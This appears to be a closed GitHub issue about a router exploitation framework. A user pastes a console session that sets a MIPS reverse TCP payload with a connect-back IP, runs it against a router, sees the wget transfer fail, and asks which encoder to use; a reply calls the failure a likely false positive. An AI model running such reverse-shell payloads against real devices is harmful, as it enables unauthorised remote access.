Closed ioocohen closed 5 years ago
Use command show encoders
. For some payloads there are not encoders available.
cmd (MIPSLE Bind TCP) > set payload mipsle/reverse_tcp cmd (MIPSLE Reverse TCP) > show options
Payload Options:
Name Current settings Description
lhost Connect-back IP address
lport 5555 Connect-back TCP Port
encoder Encoder
cmd (MIPSLE Reverse TCP) > set lhost 192.168.43.94 lhost => 192.168.43.94 cmd (MIPSLE Reverse TCP) > run [] Using wget method [] Using wget to download binary [-] Exploit failed to transfer payload
here i think i need to set a encoder but i dont know which encoder to select.
some one can solve this?
Not all payloads need an encoder apparently. If the payload is unable to transfer than this is a false positive in the router you're attempting to exploit
! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY !
Steps to Reproduce (for bugs)
1 set payload reverse_tcp 2.show options
lport 80 Connect-back TCP Port
encoder Encoder
Your Environment
python3 --version
) 3.6.7python3 -m pip freeze
)Current Behavior
Expected Behavior